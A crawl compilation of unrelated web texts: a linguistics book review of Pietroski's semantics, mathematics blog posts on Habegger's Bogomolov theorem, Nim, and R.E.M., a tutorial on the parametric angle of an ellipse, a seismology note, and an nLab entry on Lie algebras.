77) based on predicates which Pietroski shows can be motivated by classical logic (cf. 3.1) but differ from those in other current accounts. He argues that monadic predicates should not be regarded as truth-valued functions, and shows that human concepts are more restricted than what can be represented with standard logic (with its characteristic use of variables and its truth-theory-motivated use of conjunction). He also points to the observation that proper nouns cannot always be formalized with $⟨\text{e}⟩$-type expressions, which renders functor-argument application at least less straightforward. Instead of “$\mathit{\lambda }\text{x}$ [COW(x) & BROWN(x)]”, the meaning of brown cow therefore appears as “[$\text{COW(_)}{}^{\wedge }\text{BROWN(_)}$]”, conjoined by M-junction in his formal language. Finally, Pietroski holds that dyadic predicates are sufficient to represent concept relations (as opposed to the profligate adicity of predicates in logic). In his approach, therefore, every relational aspect has to be introduced by D-joining an atomic dyadic concept with a monadic concept specifying the internal relational slot. This operation is exemplified for the concept ‘above the cow’ shown below (taken from p. 104), where the existential quantifier is introduced syncategorematically to bind the internal unsaturated slot. I will not talk much about Chapters 3 to 7, where Pietroski motivates his approach in substantial and respectable depth. Chapter 3 is about retracing the developments from Frege via Tarski to Church (rather than via Carnap to Montague) as a basis for his restricted Tarski-style formalism. Chapter 4 elaborates on the Liar Paradoxes, and Chapter 5 discusses (event) framing effects, taking both of them as indicators for the need to rule out truth-theoretic accounts of meaning. Chapter 6 turns to linguistic evidence, including problems posed by lexical semantic polyadicity, argument linking, plurals, and (shifts between) mass/count word senses. Chapter 7 goes even further and discusses “minimal semantic instructions” in his framework, i. e., meaning composition of linguistic expressions containing tense, relative clauses, negation, and quantification. Chapter 8 (“Reprise”) shortly summarizes the basic tenets of the book. Suffice it to say that all this is presented in an informed manner on a broad fundament of knowledge, with a detailed argumentation (sometimes “somewhat tediously” [p. 144], as he himself admits) based on examples that are well-known to members of the Linguistics & Philosophy community. The value of CM is its competently criticizing logical approaches to meaning (composition) without dismissing them. I expect it to be a source of fruitful discussion especially among theoreticians of philosophical logic. As a Cognitivist, I can subscribe to large parts of Pietroski’s argumentation, especially when it comes to the linguistic or cognitive topics. In the following, I will elaborate on points of lesser agreement. As a start, there are some issues with terminology. First, calling natural languages “Slangs” is awkward for the ordinary linguist. Second, the whole talk of “meaning as instructions (to fetch concepts)”, e. g., “M-join(fetch@BROWN, fetch@COW)” (simplified here) is an unfortunately common case of both interpretative wording and implicit inadequate homunculization. Consider a speaking person with some content-to-be-uttered: how are the pronunciations accessed, and who is the instructor? This criticism also applies to the occasional use of “procedure” or “algorithm” by Pietroski, and shows that he takes a procedural perspective where a declarative view would be appropriate. In other words, semantics (a term Pietroski eschews, by the way) should rather be viewed as an interface between syntax and meaning (conceptual content) as proposed by some, with (Bierwisch, Lang) or without (Jackendoff) a discrete semantic level. This is explicitly denied by Pietroski (“I don’t posit any ‘interface’ between syntax and meaning”, p. 292). This brings me to the presentation of cognitive semantic ideas in CM, and referencing in general. It is quite astonishing how many people get cited/are referred to: scarcely anyone of the who’s-who-in-logic is missing (Carnap being the notable exception), not even Leibniz, Descartes or Kant. Unfortunately, this is very different with cognitive semantic linguists, although CM represents a cognitive approach to semantics and meaning. While Fillmore (event participants and framing), Jackendoff (internal semantics) and Kamp (discourse representation formalism, tense) at least get mentioned in one or two footnotes, Lakoff (quantifiers as predicates, polysemy) does not appear at all, let alone Langacker or Goldberg (constructionist analogues of argument linking). There is a similar asymmetry with regard to the content of CM. While Tarski and Church get an in-depth treatment, the linguistic parts appear to be rather superficially collected and handled. For example, while tense receives the standard Reichenbachian treatment, the intricacies of aspect are left out. From Williams, Pietroski borrows the distinction of external and internal arguments. (1) is his formalization of She stabbed him (p. 320). (1) $\text{PAST-SIMPLE(_)}{}^{\wedge }\exists \left[\text{EXTERNAL(_,_)}{}^{\wedge \phantom{\rule{-0.1667em}{0ex}}}\left[\text{FEMALE(_)}{}^{\wedge }\text{FIRST(_)}\right]\right]{}^{\wedge }$ $\text{STAB(_)}{}^{\wedge }\exists \left[\text{INTERNAL(_,_)}{}^{\wedge \phantom{\rule{-0.1667em}{0ex}}}\left[\text{MALE(_)}{}^{\wedge }\text{SECOND(_)}\right]\right]$ Leaving aside the strange handling of syntactic pronominal indices as predicates (which he admits), his representation of the structural external/internal-distinction (with predicates generalizing theta roles) seems dubious to me. Quantification is treated à la mode in CM. But in (2), the formal representation Pietroski presents for Every spy arrived (p. 331), it is by no means clear for the reader how the maximality operator is compositionally prefixed to the predicates. (2) [ EVERY(_) ${}^{\wedge }\exists \left[\text{INTERNAL(_,_)}{}^{\wedge }\text{MAX:A-SPY(_)}\right]$] ${}^{\wedge }\exists \left[\text{EXTERNAL(_,_)}{}^{\wedge }\text{MAX:ARRIVED(_)}\right]$ Let me summarize this a bit. Yes, I think Pietroski succeeds in exposing what I regard as a neglected issue in logical semantics: the fact that meanings are throughout construed as properties represented by lambda expressions (i. e., taking a semantic argument; e. g., “$\mathit{\lambda }\text{x}$ COW(x)” for cow, “$\mathit{\lambda }\text{x}$ BROWN(x)” for brown) while their linguistic expressions obviously can differ in syntactic argument structure (yet CM offers no alternative for the corresponding distinction between referential and non-referential semantic arguments). And yes, I also think that current semantic composition mechanisms are too powerful. However, Pietroski throws out the baby with the bath water when abandoning variables, predicates with 3+ arguments, and lambda calculus altogether. Before doing that, he should have shown that his formalism is able to deal with the intricate aspects of semantics discussed in the last 40 years or so (the distinction of linguistic and non-linguistic concepts; detailed semantic analyses of lexical items; principles of polysemy; coherently handling linguistic domains like gradation and quantification in language understanding, production, and learning), and that the desired cognitive formalization cannot be achieved by restricting and extending the available mechanisms. For example, it is hard to conceive of decompositional semantic approaches without named variables, and personally, I think that variable-binding quantifiers, not variables, are the real problem (note also the heterogeneity of “∃” and “every(_)” in CM). Most importantly, with his internalist Fodorian semantics Pietroski has lost what is so important both for logic and cognition: the relation to the world. The count/mass-distinction and the problems it poses for semantics and ontology can be used to exemplify this point. His solution, as I understand it, is to have distinction-less stem-concepts (marked with “$\sqrt{\phantom{\mathit{a}}}$”) for all nouns (e. g., “$\sqrt{\phantom{\mathit{a}}}\text{FISH(_)}$”), which can be joined with certain distinguisher-concepts to yield countable or mass concepts (similar to classifier languages). Stein’s famous quotation, slightly modified, fits perfectly as an objection here: “A rose is an object is an object!” In other words, while there seem to be ways of coercion between count and mass, rose denotes countable objects, and before abstracting to some hypothesized common denominator, one might rather consider formalizing the mechanisms of coercion as part of a general theory of polysemy. Correspondingly, given the importance of the structure of the (if only perceptual) world, and recent widespread interest both in cognition and in what there is or can be (experienced) (Carstensen 2011, Decock 2018, Zlatev 2016), one should start there and then build or modify formal systems accordingly. ## References • Carstensen, Kai-Uwe. 2011. Toward cognitivist ontologies. Cognitive Processing 12(4). 379–393. • Decock, Lieven. 2018. Cognitive metaphysics. Frontiers in Psychology 9(1700). 1–11. • Speaks, Jeff. 2018. Theories of meaning. In Edward N. Zalta (ed.), The Stanford Encyclopedia of Philosophy (Winter 2018 Edition). https://plato.stanford.edu/archives/win2018/entries/meaning/ (03.01.2019). Google Scholar • Zlatev, Jordan. 2016. Turning back to experience in cognitive linguistics via phenomenology. Cognitive Linguistics 27(4). 559–572. Published Online: 2019-09-14 Published in Print: 2019-11-03 Citation Information: Zeitschrift für Sprachwissenschaft, Volume 38, Issue 2, Pages 299–303, ISSN (Online) 1613-3706, ISSN (Print) 0721-9067, Export Citation
2019-12-07 11:04:28
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 13, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6618689298629761, "perplexity": 5325.38082232781}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540499389.15/warc/CC-MAIN-20191207105754-20191207133754-00543.warc.gz"}
http://quomodocumque.wordpress.com/2011/11/
## Jay Michaelson on God vs. Gay, Dec 1 My friend Jay Michaelson, my go-to guy for all matters of Jewish learning, is speaking in Madison this Thursday evening about his new book God vs. Gay?:  The Religious Case for Equality. Recommended for all who care what feist left-wing observant Jews have to say about religion and sex.  Which is everyone, right? Book trailer: Tagged , , , , ## Why do people think government workers are stupid? From Michael Lewis’s The Big Short: “You know how when you walk into a post office you realize there is such a difference between a government employee and other people,” said Vinny. “The ratings agency people were all like government employees.” Collectively they had more power than anyone in the bond markets, but individually they were nobodies. “They’re underpaid,” said Eisman. “The smartest ones leave for Wall Street firms so they can help manipulate the companies they used to work for. Where does it come from, this idea that people whose employer is the city, state, or nation are made of inferior stuff?  What is the “difference” Vinny perceives between the person helping him at the post office and the teller at his bank?  Does he really get worse service at the DMV than he gets from United Airlines?    Does he not have cable? ## The Arrow-Debreu model wishes you a happy Thanksgiving I keep going to talks that raise the question:  what is an equilibrium, in the sense of economics?  Not “what is the mathematical definition,” but “what is it, really?”  (The Big Short is relevant here too.)   I don’t have any thoughts of my own articulate enough for the blog, but in the spirit of the holiday I should certainly link to Cosma Shalizi’s explanation of why conceptual art is the most economically efficient use of a dead turkey.  Gobble gobble. Tagged , , ## Math Girls The holiday season approaches and surely you are looking for a new translation of a bestselling young adult novel from Japan which is half adolescent love story and half elementary number theory text.  You’re in luck.  Bento Books sent me a review copy of the book, Math Girls by Hiroshi Yuki (tr. Tony Gonzalez) and by the second chapter the narrative has already addressed not only the fact that 1 is not prime, but the fact that it’s entirely in our hands whether to define 1 to be a prime or not, and why we made the choice we did.  How romantic! Sample chapters here. Tagged ## Are math departments better at recruitment than elite financial firms? Via Bryan Caplan, Lauren Rivera at Northwestern studied hiring practices at top financial, law, and consulting firms and found some surprises: [E]valuators drew strong distinctions between top four universities, schools that I term the super-elite, and other types of selective colleges and universities. So-called “public Ivies” such as University of Michigan and Berkeley were not considered elite or even prestigious… In addition to being an indicator of potential intellectual deficits, the decision to go to a lesser known school (because it was typically perceived by evaluators as a “choice”) was often perceived to be evidence of moral failings, such as faulty judgment or a lack of foresight on the part of a student. I’m not sure what those four schools are, but they exclude some pretty good undergraduates: You will find it when you go to like career fairs or something and you know someone will show up and say, you know, “Hey, I didn’t go to HBS [Harvard Business School] but, you know, I am an engineer at M.I.T. and I heard about this fair and I wanted to come meet you in New York.” God bless him for the effort but, you know, it’s just not going to work. And don’t neglect those extracurriculars: [E]valuators believed that the most attractive and enjoyable coworkers and candidates would be those who had strong extracurricular “passions.” They also believed that involvement in activities outside of the classroom was evidence of superior social skill; they assumed a lack of involvement was a signal of social deficiencies… By contrast, those without significant extracurricular experiences or those who participated in activities that were primarily academically or pre-professionally oriented were perceived to be “boring,” “tools,” “bookworms,” or “nerds” who might turn out to be “corporate drones” if hired. All this stuff sounds bizarre to people outside the world of corporate recruitment.  And it is natural for academics like me to read this and silently congratulate myself on our superior methods of judgment.  But surely there are things about our process which would seem just as irrational and counterproductive to people outside of academic mathematics.  What are they? It might make more sense to concentrate on graduate recruitment as against tenure-track hiring, since then both we and the financiers are talking about recent BAs with little track record in the workplace. (Linguistic note:  “Counterproductive” is surely a word that people would deride as horrible managementese if it weren’t already in common use.  But it’s a great word!) (Upcoming blog note: At some point soon I’ll blog about Michael Lewis’s The Big Short, which I just finished, and which is the reason the credentials of financial professionals are on my mind.) ## Scott Walker: not toast Much was made of the WPR/St. Norbert poll released last week, in which 58% of respondents said they’d vote for Scott Walker’s opponent if a recall comes to pass, with only 38% saying they’d vote to keep the Governor in office.  Worth noting the numbers below the top line, though:  in the sample of 482 voters, 34% reported voting for JoAnne Kloppenburg in April’s Supreme Court election, against 27% who said they voted for Prosser.  In fact, those votes were evenly split.  So it’s way, way, way too soon to say that Walker’s behind in a potential recall election, especially with Wisconsin D’s still in search of a candidate. (Another interesting result from that poll:  people in Wisconsin apparently really like electing their Supreme Court, and in fact would prefer that the prospective justice’s party affiliation be listed on the ballot!) ## Gonality, the Bogomolov property, and Habegger’s theorem on Q(E^tors) I promised to say a little more about why I think the result of Habegger’s recent paper, ” Small Height and Infinite Non-Abelian Extensions,” is so cool. First of all:  we say an algebraic extension K of Q has the Bogomolov property if there is no infinite sequence of non-torsion elements x in K^* whose absolute logarithmic height tends to 0.  Equivalently, 0 is isolated in the set of absolute heights in K^*.  Finite extensions of Q evidently have the Bogomolov property (henceforth:  (B)) but for infinite extensions the question is much subtler.  Certainly $\bar{\mathbf{Q}}$ itself doesn’t have (B):  consider the sequence $2^{1/2}, 2^{1/3}, 2^{1/4}, \ldots$  On the other hand, the maximal abelian extension of Q is known to have (B) (Amoroso-Dvornicich) , as is any extension which is totally split at some fixed place p (Schinzel for the real prime, Bombieri-Zannier for the other primes.) Habegger has proved that, when E is an elliptic curve over Q, the field Q(E^tors) obtained by adjoining all torsion points of E has the Bogomolov property. What does this have to do with gonality, and with my paper with Chris Hall and Emmanuel Kowalski from last year? Suppose we ask about the Bogomolov property for extensions of a more general field F?  Well, F had better admit a notion of absolute Weil height.  This is certainly OK when F is a global field, like the function field of a curve over a finite field k; but in fact it’s fine for the function field of a complex curve as well.  So let’s take that view; in fact, for simplicity, let’s take F to be C(t). What does it mean for an algebraic extension F’ of F to have the Bogomolov property?  It means that there is a constant c such that, for every finite subextension L of F and every non-constant function x in L^*, the absolute logarithmic height of x is at least c. Now L is the function field of some complex algebraic curve C, a finite cover of P^1.  And a non-constant function x in L^* can be thought of as a nonzero principal divisor.  The logarithmic height, in this context, is just the number of zeroes of x — or, if you like, the number of poles of x — or, if you like, the degree of x, thought of as a morphism from C to the projective line.  (Not necessarily the projective line of which C is a cover — a new projective line!)  In the number field context, it was pretty easy to see that the log height of non-torsion elements of L^* was bounded away from 0.  That’s true here, too, even more easily — a non-constant map from C to P^1 has degree at least 1! There’s one convenient difference between the geometric case and the number field case.  The lowest log height of a non-torsion element of L^* — that is, the least degree of a non-constant map from C to P^1 — already has a name.  It’s called the gonality of C.  For the Bogomolov property, the relevant number isn’t the log height, but the absolute log height, which is to say the gonality divided by [L:F]. So the Bogomolov property for F’ — what we might call the geometric Bogomolov property — says the following.  We think of F’ as a family of finite covers C / P^1.  Then (GB)  There is a constant c such that the gonality of C is at least c deg(C/P^1), for every cover C in the family. What kinds of families of covers are geometrically Bogomolov?  As in the number field case, you can certainly find some families that fail the test — for instance, gonality is bounded above in terms of genus, so any family of curves C with growing degree over P^1 but bounded genus will do the trick. On the other hand, the family of modular curves over X(1) is geometrically Bogomolov; this was proved (independently) by Abramovich and Zograf.  This is a gigantic and elegant generalization of Ogg’s old theorem that only finitely many modular curves are hyperelliptic (i.e. only finitely many have gonality 2.) At this point we have actually more or less proved the geometric version of Habegger’s theorem!  Here’s the idea.  Take F = C(t) and let E/F be an elliptic curve; then to prove that F(E(torsion)) has (GB), we need to give a lower bound for the curve C_N obtained by adjoining an N-torsion point to F.  (I am slightly punting on the issue of being careful about other fields contained in F(E(torsion)), but I don’t think this matters.)  But C_N admits a dominant map to X_1(N); gonality goes down in dominant maps, so the Abramovich-Zograf bound on the gonality of X_1(N) provides a lower bound for the gonality of C_N, and it turns out that this gives exactly the bound required. What Chris, Emmanuel and I proved is that (GB) is true in much greater generality — in fact (using recent results of Golsefidy and Varju that slightly postdate our paper) it holds for any extension of C(t) whose Galois group is a perfect Lie group with Z_p or Zhat coefficients and which is ramified at finitely many places; not just the extension obtained by adjoining torsion of an elliptic curve, for instance, but the one you get from the torsion of an abelian variety of arbitrary dimension, or for that matter any other motive with sufficiently interesting Mumford-Tate group. Question:   Is Habegger’s theorem true in this generality?  For instance, if A/Q is an abelian variety, does Q(A(tors)) have the Bogomolov property? Question:  Is there any invariant of a number field which plays the role in the arithmetic setting that “spectral gap of the Laplacian” plays for a complex algebraic curve? A word about Habegger’s proof.  We know that number fields are a lot more like F_q(t) than they are like C(t).  And the analogue of the Abramovich-Zograf bound for modular curves over F_q is known as well, by a theorem of Poonen.  The argument is not at all like that of Abramovich and Zograf, which rests on analysis in the end.  Rather, Poonen observes that modular curves in characteristic p have lots of supersingular points, because the square of Frobenius acts as a scalar on the l-torsion in the supersingular case.  But having a lot of points gives you a lower bound on gonality!  A curve with a degree d map to P^1 has at most d(q+1) points, just because the preimage of each of the q+1 points of P^1(q) has size at most d.  (You just never get too old or too sophisticated to whip out the Pigeonhole Principle at an opportune moment….) Now I haven’t studied Habegger’s argument in detail yet, but look what you find right in the introduction: The non-Archimedean estimate is done at places above an auxiliary prime number p where E has good supersingular reduction and where some other technical conditions are met…. In this case we will obtain an explicit height lower bound swiftly using the product formula, cf. Lemma 5.1. The crucial point is that supersingularity forces the square of the Frobenius to act as a scalar on the reduction of E modulo p. Yup!  There’s no mention of Poonen in the paper, so I think Habegger came to this idea independently.  Very satisfying!  The hard case — for Habegger as for Poonen — has to do with the fields obtained by adjoining p-torsion, where p is the characteristic of the supersingular elliptic curve driving the argument.  It would be very interesting to hear from Poonen and/or Habegger whether the arguments are similar in that case too! ## Help me be a great Nim teacher I’ll be at Marvelous Math Morning at CJ’s school this Saturday, playing Nim with kids ranging from K-5.  One simple goal is to teach them the winning strategy for the version of the game where there’s one pile and each player can draw 1 or 2 chips.  I’ve done that with CJ and he really liked it — and I think the idea of a perfect strategy is one of those truly deep mathematical concepts that even little kids can grasp. But what else should I do?  What other Nims and Nimlikes should I teach these kids and what lessons should I try to impart thereby? Update:  First two commenters both mentioned Tic-Tac-Toe.  At what age do kids typically learn how to play Tic-Tac-Toe and at what age have they learned a perfect strategy?  CJ is in kindergarten and has not seen this, or at least he hasn’t seen it from me.  I’ll ask him tonight. Update:  Nim a success!  I played mostly one-pile, and the kids were definitely able to grasp pretty quickly the idea of winning and losing positions, and the goal of chasing the former and avoiding the latter.  I didn’t encounter anyone who’d played nim before.  I felt some math was transmitted.  Mission accomplished. Tagged , , , ## R.E.M. and Cal Ripken Dave Daley delivers a great, frank interview with Michael Stipe on R.E.M.’s breakup. I would rather throw myself off a cliff or be boiled in lead than listen to “Life’s Rich Pageant” demos – [and here Stipe groan sings unintelligible syllables as if he is in pain] — my doing this horrible moaning over a song that then became a beautiful song. Peter and Mike love that stuff. Somehow I have managed not to write anything in this space about the end of my very favorite rock band.  The post I was going to write was about R.E.M. and Cal Ripken — both of whom were, from start to finish, so recognizably themselves as to be a pleasure to watch, even with half their power gone.  Both of them announced an new way to play their position, and neither would ever be mistaken for the imitators they made possible.  (I like to think that Derek Jeter is Live in this scenario, but really only because I hate both so very much.)  I guess the way that Stipe doesn’t sound like a great singer, but is one, matches the way that Ripken didn’t look like a great fielder, but was one.  Where were the dives, where were the behind-the-back flips?  No need — Ripken was just always standing where the ball was going to be.  And Stipe was always singing what the song wanted him to sing, whether or not you could make well-defined words, or even well-defined notes, out of it. Murmur and Ripken’s first MVP season were surely the two best things about 1983  — though Pete Thorn, decades ago, was saying that Ripken’s astounding defense in 1984 made that an even better season — a suggestion that was ignored at the time, but WAR agrees.  Maybe Pete Thorn is the analogue of the diehards who think Fables is better than Murmur.  (Except Thorn was probably right.)   People who love Automatic for the People would no doubt call that record the analogue of Ripken’s out-of-nowhere MVP year in 1991 — not me, though.  And R.E.M. never really did anything that matches the lonely beauty of a half-season that Ripken turned in in 1999, at the age of 38, for a team going nowhere — in fact, a team that, once Ripken left, would spend most of a decade going nowhere, and the rest of the time actually being  nowhere. Most days I think “Pilgrimage” is the greatest song they ever made: though at the time I might have preferred “It’s The End of the World As We Know It (and I feel fine),” whose lyrics I resolutely memorized, and on behalf of which I launched a doomed campaign for my high school’s 1989 prom theme. It would have been a really great prom theme.
2014-12-22 09:56:27
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 2, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.515026330947876, "perplexity": 1763.6954453901342}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-52/segments/1418802775083.81/warc/CC-MAIN-20141217075255-00146-ip-10-231-17-201.ec2.internal.warc.gz"}
https://socratic.org/questions/how-can-an-absolute-value-equation-have-no-solution
# How can an absolute value equation have no solution? For example, $| x | = - 1$ has no solution. $| x | \ne - y$
2022-05-26 08:19:02
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 2, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8190541863441467, "perplexity": 268.17543021467696}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662604495.84/warc/CC-MAIN-20220526065603-20220526095603-00674.warc.gz"}
http://geophydog.cool/post/ccf_noise_source/
New responses, if the wave field is diffuse, can be retrieved from interstaion cross-correlation of ambient noise. However, the cross-correlation time functions are asymmetric if the noise sources distribute unevenly. Here, we give you an example to show that how the cross-correlation functions vary with the angles of noise sources (red dots). We computed synthetic seismograms of earthquakes with angles from 1 to 360 degrees with an interval of 1 degree and data are recorded by two receivers (blue triangles); then we compute the cross-correlation time functions and align them with the angles; lastly, we stack all the cross-correlations to show you it’s symmetric under the condition that the noise sources distribute evenly.
2023-03-25 08:50:14
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8232744932174683, "perplexity": 987.3562685106685}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945317.85/warc/CC-MAIN-20230325064253-20230325094253-00602.warc.gz"}
http://petercollingridge.co.uk/tutorials/computational-geometry/finding-angle-around-ellipse/
Finding the angle around an ellipse Jan. 29, 2014 When is the angle around an ellipse, not the around around the an ellipse? This is a problem which tripped me up a few times when working with elliptical orbits and arcs. The problem This problem arises when we use a parametric equation for an ellipse, defining the point on an ellipse as a function of $\theta$ with these two equations. $x = a \cdot cos(\theta) \\ y = b \cdot sin(\theta)$ Where $a$ is the length of the axis aligned with the x-axis and $b$ is the length of the axis aligned with the y-axis (I'm assuming the ellipse is oriented such that the axes). The mistake The temptation is to assume that $\theta$ represents the angle around the ellipse, which it does if your ellipse is a circle, or when $\theta = \{0, \frac{\pi}{2}, \pi, \frac{3\pi}{2}\}$. However, in most circumstance $\theta$ does not represent an angle. The question then is how to find the angle $\phi$, around the ellipse to point (x, y). The solution The hardest part of the problem is to realise that there is a problem. After that, it's basic trigonometry to find the solution. \qquad\begin{align} tan(\phi) &= \frac{y}{x} \\ tan(\phi) &= \frac{b \cdot sin(\theta)}{a \cdot cos(\theta)} \\ tan(\phi) &= \frac{b}{a} \cdot tan(\theta) \\ \phi &= atan \left(\frac{b}{a} \cdot tan(\theta)\right) \end{align} Likewise, you can calculate the inverse with: $\qquad\theta = atan \left(\frac{a}{b} \cdot tan(\phi)\right)$ This is particularly useful for generating arcs in Processing.js where $\theta$ is used in the calculation for the angles to start and stop. If you want to find a point on the ellipse which aligns with another point (px, py), and the origin (say placing a planet on an elliptic orbit based on a mouse click), it's even easier. $\qquad\theta = atan \left(\frac{a \cdot py}{b \cdot px} \right)$ The hardest part of all this was realising that the parametric "angle" I was using to define an elliptic arc was not the angle I expected or really any sort of angle at all. Philip on Jan. 23, 2018, 11:07 p.m. Hi! Thanks for the hint : ) ) I spent 30 minutes trying to understand why by using theta angle I couldn't find the right dot on the ellipse, I knew I was doing something wrong .. and after googling I immediately found your post and solved the problem immidiately.. Thank you for sharing in your blog! Wade on May 16, 2018, 8:16 p.m. Can this help to impose the initial nodal points such that the equal arclength between two points on ellipse? If yes, then Given the arclength how to compute the corresponding angle?
2018-05-22 15:44:51
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9994456171989441, "perplexity": 432.0768025804618}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794864798.12/warc/CC-MAIN-20180522151159-20180522171159-00000.warc.gz"}
http://www.ncatlab.org/nlab/show/LieAlg
∞-Lie theory # Contents ## Definition The category $Lie Alg$ is that whose objects are Lie algebras $(\mathfrak{g}, [-,-]_{\mathfrak{g}})$ and whose morphisms are Lie algebra homomorphisms, that is linear maps $\phi\colon \mathfrak{g} \to \mathfrak{h}$ such that for all $x,y \in \mathfrak{g}$ we have $\phi( [x,y]_{\mathfrak{g}}) = [\phi(x),\phi(y)]_\mathfrak{h} \,.$ If Lie algebras are expressed in terms of their Chevalley–Eilenberg algebras (and if restricted to finite-dimensional Lie algebras), this may equivalently be characterized as follows: $Lie Alg$ is the full subcategory of the opposite category of the category dgAlg of dg-algebras on those dg-algebras whose underlying graded algebra is a Grassmann algebra, i.e. of the form $\wedge^\bullet \mathfrak{g}$. ## Special objects category: category Revised on October 24, 2012 02:18:45 by Toby Bartels (64.89.53.111)
2015-02-27 07:32:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 12, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9391260743141174, "perplexity": 523.0298949871487}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-11/segments/1424936460577.67/warc/CC-MAIN-20150226074100-00102-ip-10-28-5-156.ec2.internal.warc.gz"}
https://activecalculus.org/prelude/sec-poly-infty.html
